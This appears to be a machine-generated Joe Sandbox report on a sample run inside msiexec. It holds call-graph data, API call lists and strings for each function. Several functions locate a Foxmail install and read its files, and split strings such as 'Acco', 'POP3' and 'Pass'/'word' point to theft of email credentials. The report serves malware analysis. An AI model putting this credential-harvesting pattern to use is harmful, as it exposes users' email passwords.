2232ae8c 7019->7023 7021 2232aea1 CloseHandle 7020->7021 7021->7015 7024 2232aead GetLastError 7021->7024 7022 2232aedd 7022->7008 7026 22328d52 26 API calls 7023->7026 7024->7015 7025 22326332 __dosmaperr 20 API calls 7025->7022 7026->7017 7039 22328c9e RtlLeaveCriticalSection 7027->7039 7029 2232ada4 7029->7010 7031 22328cd0 7030->7031 7032 22328d37 7030->7032 7031->7032 7038 22328cfa 7031->7038 7033 22326368 _free 20 API calls 7032->7033 7034 22328d3c 7033->7034 7035 22326355 __dosmaperr 20 API calls 7034->7035 7036 22328d27 7035->7036 7036->7022 7036->7025 7037 22328d21 SetStdHandle 7037->7036 7038->7036 7038->7037 7039->7029 7040->6795 7041->6775 7042 22322049 7043 22322055 ___scrt_is_nonwritable_in_current_image 7042->7043 7044 223220d3 7043->7044 7045 2232207d 7043->7045 7055 2232205e 7043->7055 7046 22322639 ___scrt_fastfail 4 API calls 7044->7046 7056 2232244c 7045->7056 7048 223220da 7046->7048 7049 22322082 7065 22322308 7049->7065 7051 22322087 __RTC_Initialize 7068 223220c4 7051->7068 7053 2232209f 7071 2232260b 7053->7071 7057 22322451 ___scrt_release_startup_lock 7056->7057 7058 22322455 7057->7058 7061 22322461 7057->7061 7059 2232527a _abort 20 API calls 7058->7059 7060 2232245f 7059->7060 7060->7049 7062 2232246e 7061->7062 7063 2232499b _abort 28 API calls 7061->7063 7062->7049 7064 22324bbd 7063->7064 7064->7049 7077 223234c7 RtlInterlockedFlushSList 7065->7077 7067 22322312 7067->7051 7079 2232246f 7068->7079 7070 223220c9 ___scrt_release_startup_lock 7070->7053 7072 22322617 7071->7072 7073 2232262d 7072->7073 7098 223253ed 7072->7098 7073->7055 7076 22323529 ___vcrt_uninitialize 8 API calls 7076->7073 7078 223234d7 7077->7078 7078->7067 7084 223253ff 7079->7084 7082 2232391b ___vcrt_uninitialize_ptd 6 API calls 7083 2232354d 7082->7083 7083->7070 7087 22325c2b 7084->7087 7088 22322476 7087->7088 7089 22325c35 7087->7089 7088->7082 7091 22325db2 7089->7091 7092 22325c45 _abort 5 API calls 7091->7092 7093 22325dd9 7092->7093 7094 22325df1 
TlsFree 7093->7094 7095 22325de5 7093->7095 7094->7095 7096 22322ada _ValidateLocalCookies 5 API calls 7095->7096 7097 22325e02 7096->7097 7097->7088 7101 223274da 7098->7101 7103 223274f3 7101->7103 7102 22322ada _ValidateLocalCookies 5 API calls 7104 22322625 7102->7104 7103->7102 7104->7076 7248 22328a89 7251 22326d60 7248->7251 7252 22326d72 7251->7252 7253 22326d69 7251->7253 7255 22326c5f 7253->7255 7256 22325af6 _abort 38 API calls 7255->7256 7257 22326c6c 7256->7257 7258 22326d7e __fassign 38 API calls 7257->7258 7259 22326c74 7258->7259 7275 223269f3 7259->7275 7262 22326c8b 7262->7252 7263 223256d0 21 API calls 7264 22326c9c 7263->7264 7270 22326cce 7264->7270 7282 22326e20 7264->7282 7267 2232571e _free 20 API calls 7267->7262 7268 22326cc9 7269 22326368 _free 20 API calls 7268->7269 7269->7270 7270->7267 7271 22326ce6 7272 22326d12 7271->7272 7273 2232571e _free 20 API calls 7271->7273 7272->7270 7292 223268c9 7272->7292 7273->7272 7276 223254a7 __fassign 38 API calls 7275->7276 7277 22326a05 7276->7277 7278 22326a26 7277->7278 7279 22326a14 GetOEMCP 7277->7279 7280 22326a2b GetACP 7278->7280 7281 22326a3d 7278->7281 7279->7281 7280->7281 7281->7262 7281->7263 7283 223269f3 40 API calls 7282->7283 7284 22326e3f 7283->7284 7287 22326e90 IsValidCodePage 7284->7287 7289 22326e46 7284->7289 7291 22326eb5 ___scrt_fastfail 7284->7291 7285 22322ada _ValidateLocalCookies 5 API calls 7286 22326cc1 7285->7286 7286->7268 7286->7271 7288 22326ea2 GetCPInfo 7287->7288 7287->7289 7288->7289 7288->7291 7289->7285 7295 22326acb GetCPInfo 7291->7295 7368 22326886 7292->7368 7294 223268ed 7294->7270 7300 22326b05 7295->7300 7304 22326baf 7295->7304 7297 22322ada _ValidateLocalCookies 5 API calls 7299 22326c5b 7297->7299 7299->7289 7305 223286e4 7300->7305 7303 22328a3e 43 API calls 7303->7304 7304->7297 7306 223254a7 __fassign 38 API calls 7305->7306 7307 22328704 MultiByteToWideChar 7306->7307 7311 22328742 7307->7311 7316 223287da 7307->7316 7309 22322ada 
_ValidateLocalCookies 5 API calls 7313 22326b66 7309->7313 7310 22328763 ___scrt_fastfail 7314 223287d4 7310->7314 7317 223287a8 MultiByteToWideChar 7310->7317 7311->7310 7312 223256d0 21 API calls 7311->7312 7312->7310 7319 22328a3e 7313->7319 7324 22328801 7314->7324 7316->7309 7317->7314 7318 223287c4 GetStringTypeW 7317->7318 7318->7314 7320 223254a7 __fassign 38 API calls 7319->7320 7321 22328a51 7320->7321 7328 22328821 7321->7328 7325 2232880d 7324->7325 7327 2232881e 7324->7327 7326 2232571e _free 20 API calls 7325->7326 7325->7327 7326->7327 7327->7316 7329 2232883c 7328->7329 7330 22328862 MultiByteToWideChar 7329->7330 7331 22328a16 7330->7331 7332 2232888c 7330->7332 7333 22322ada _ValidateLocalCookies 5 API calls 7331->7333 7335 223256d0 21 API calls 7332->7335 7338 223288ad 7332->7338 7334 22326b87 7333->7334 7334->7303 7335->7338 7336 223288f6 MultiByteToWideChar 7337 22328962 7336->7337 7339 2232890f 7336->7339 7341 22328801 __freea 20 API calls 7337->7341 7338->7336 7338->7337 7355 22325f19 7339->7355 7341->7331 7343 22328971 7345 223256d0 21 API calls 7343->7345 7349 22328992 7343->7349 7344 22328939 7344->7337 7347 22325f19 11 API calls 7344->7347 7345->7349 7346 22328a07 7348 22328801 __freea 20 API calls 7346->7348 7347->7337 7348->7337 7349->7346 7350 22325f19 11 API calls 7349->7350 7351 223289e6 7350->7351 7351->7346 7352 223289f5 WideCharToMultiByte 7351->7352 7352->7346 7353 22328a35 7352->7353 7354 22328801 __freea 20 API calls 7353->7354 7354->7337 7356 22325c45 _abort 5 API calls 7355->7356 7357 22325f40 7356->7357 7360 22325f49 7357->7360 7363 22325fa1 7357->7363 7361 22322ada _ValidateLocalCookies 5 API calls 7360->7361 7362 22325f9b 7361->7362 7362->7337 7362->7343 7362->7344 7364 22325c45 _abort 5 API calls 7363->7364 7365 22325fc8 7364->7365 7366 22322ada _ValidateLocalCookies 5 API calls 7365->7366 7367 22325f89 LCMapStringW 7366->7367 7367->7360 7369 22326892 ___scrt_is_nonwritable_in_current_image 7368->7369 7376 22325671 
RtlEnterCriticalSection 7369->7376 7371 2232689c 7377 223268f1 7371->7377 7375 223268b5 _abort 7375->7294 7376->7371 7389 22327011 7377->7389 7379 2232693f 7380 22327011 26 API calls 7379->7380 7381 2232695b 7380->7381 7382 22327011 26 API calls 7381->7382 7383 22326979 7382->7383 7384 223268a9 7383->7384 7385 2232571e _free 20 API calls 7383->7385 7386 223268bd 7384->7386 7385->7384 7403 223256b9 RtlLeaveCriticalSection 7386->7403 7388 223268c7 7388->7375 7390 22327022 7389->7390 7394 2232701e 7389->7394 7391 22327029 7390->7391 7396 2232703c ___scrt_fastfail 7390->7396 7392 22326368 _free 20 API calls 7391->7392 7393 2232702e 7392->7393 7395 223262ac _abort 26 API calls 7393->7395 7394->7379 7395->7394 7396->7394 7397 2232706a 7396->7397 7398 22327073 7396->7398 7399 22326368 _free 20 API calls 7397->7399 7398->7394 7400 22326368 _free 20 API calls 7398->7400 7401 2232706f 7399->7401 7400->7401 7402 223262ac _abort 26 API calls 7401->7402 7402->7394 7403->7388 7105 2232724e GetProcessHeap 7106 2232284f 7107 22322882 std::exception::exception 27 API calls 7106->7107 7108 2232285d 7107->7108 6397 2232220c 6398 22322215 6397->6398 6399 2232221a dllmain_dispatch 6397->6399 6401 223222b1 6398->6401 6402 223222c7 6401->6402 6404 223222d0 6402->6404 6405 22322264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6402->6405 6404->6399 6405->6404

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22321137
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321151
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232115C
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232116D
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232117C
                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321193
                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 223211D0
                                                                                        • FindClose.KERNEL32(00000000), ref: 223211DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 1083526818-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22321434
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22321137
                                                                                          • Part of subcall function 223210F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321151
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232115C
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232116D
                                                                                          • Part of subcall function 223210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2232117C
                                                                                          • Part of subcall function 223210F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22321193
                                                                                          • Part of subcall function 223210F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 223211D0
                                                                                          • Part of subcall function 223210F1: FindClose.KERNEL32(00000000), ref: 223211DB
                                                                                        • lstrlenW.KERNEL32(?), ref: 223214C5
                                                                                        • lstrlenW.KERNEL32(?), ref: 223214E0
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 2232150F
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321521
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 22321547
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321553
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 22321579
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 22321585
                                                                                        • lstrlenW.KERNEL32(?,?), ref: 223215AB
                                                                                        • lstrcatW.KERNEL32(00000000), ref: 223215B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                                        • API String ID: 672098462-2938083778
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 223261DA
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 223261E4
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 223261F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082,22332108,0000000C,22321F3A,?), ref: 22324AD5
                                                                                        • TerminateProcess.KERNEL32(00000000,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082,22332108,0000000C,22321F3A,?), ref: 22324ADC
                                                                                        • ExitProcess.KERNEL32 ref: 22324AEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 22321CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D1B
                                                                                          • Part of subcall function 22321CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22321D37
                                                                                          • Part of subcall function 22321CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D4B
                                                                                        • _strlen.LIBCMT ref: 22321855
                                                                                        • _strlen.LIBCMT ref: 22321869
                                                                                        • _strlen.LIBCMT ref: 2232188B
                                                                                        • _strlen.LIBCMT ref: 223218AE
                                                                                        • _strlen.LIBCMT ref: 223218C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen$File$CopyCreateDelete
                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                        • API String ID: 3296212668-3023110444

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                                        • API String ID: 4218353326-230879103

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 22327D06
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290D7
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290E9
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223290FB
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232910D
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232911F
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329131
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329143
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329155
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329167
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 22329179
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232918B
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 2232919D
                                                                                          • Part of subcall function 223290BA: _free.LIBCMT ref: 223291AF
                                                                                        • _free.LIBCMT ref: 22327CFB
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 22327D1D
                                                                                        • _free.LIBCMT ref: 22327D32
                                                                                        • _free.LIBCMT ref: 22327D3D
                                                                                        • _free.LIBCMT ref: 22327D5F
                                                                                        • _free.LIBCMT ref: 22327D72
                                                                                        • _free.LIBCMT ref: 22327D80
                                                                                        • _free.LIBCMT ref: 22327D8B
                                                                                        • _free.LIBCMT ref: 22327DC3
                                                                                        • _free.LIBCMT ref: 22327DCA
                                                                                        • _free.LIBCMT ref: 22327DE7
                                                                                        • _free.LIBCMT ref: 22327DFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 223259EA
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223259F6
                                                                                        • _free.LIBCMT ref: 22325A01
                                                                                        • _free.LIBCMT ref: 22325A0C
                                                                                        • _free.LIBCMT ref: 22325A17
                                                                                        • _free.LIBCMT ref: 22325A22
                                                                                        • _free.LIBCMT ref: 22325A2D
                                                                                        • _free.LIBCMT ref: 22325A38
                                                                                        • _free.LIBCMT ref: 22325A43
                                                                                        • _free.LIBCMT ref: 22325A51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: DecodePointer
                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                        • API String ID: 3527080286-3064271455

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D1B
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22321D37
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D4B
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D58
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D72
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D7D
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 1454806937-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22329C07,?,00000000,?,00000000,00000000), ref: 223294D4
                                                                                        • __fassign.LIBCMT ref: 2232954F
                                                                                        • __fassign.LIBCMT ref: 2232956A
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22329590
                                                                                        • WriteFile.KERNEL32(?,?,00000000,22329C07,00000000,?,?,?,?,?,?,?,?,?,22329C07,?), ref: 223295AF
                                                                                        • WriteFile.KERNEL32(?,?,?,22329C07,00000000,?,?,?,?,?,?,?,?,?,22329C07,?), ref: 223295E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 2232339B
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 223233A3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 22323431
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 2232345C
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 223234B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 22329221: _free.LIBCMT ref: 2232924A
                                                                                        • _free.LIBCMT ref: 223292AB
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223292B6
                                                                                        • _free.LIBCMT ref: 223292C1
                                                                                        • _free.LIBCMT ref: 22329315
                                                                                        • _free.LIBCMT ref: 22329320
                                                                                        • _free.LIBCMT ref: 2232932B
                                                                                        • _free.LIBCMT ref: 22329336
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22326FFD,00000000,?,?,?,22328A72,?,?,00000100), ref: 2232887B
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22328A72,?,?,00000100,5EFC4D8B,?,?), ref: 22328901
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 223289FB
                                                                                        • __freea.LIBCMT ref: 22328A08
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        • __freea.LIBCMT ref: 22328A11
                                                                                        • __freea.LIBCMT ref: 22328A36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _strlen.LIBCMT ref: 22321607
                                                                                        • _strcat.LIBCMT ref: 2232161D
                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2232190E,?,?,00000000,?,00000000), ref: 22321643
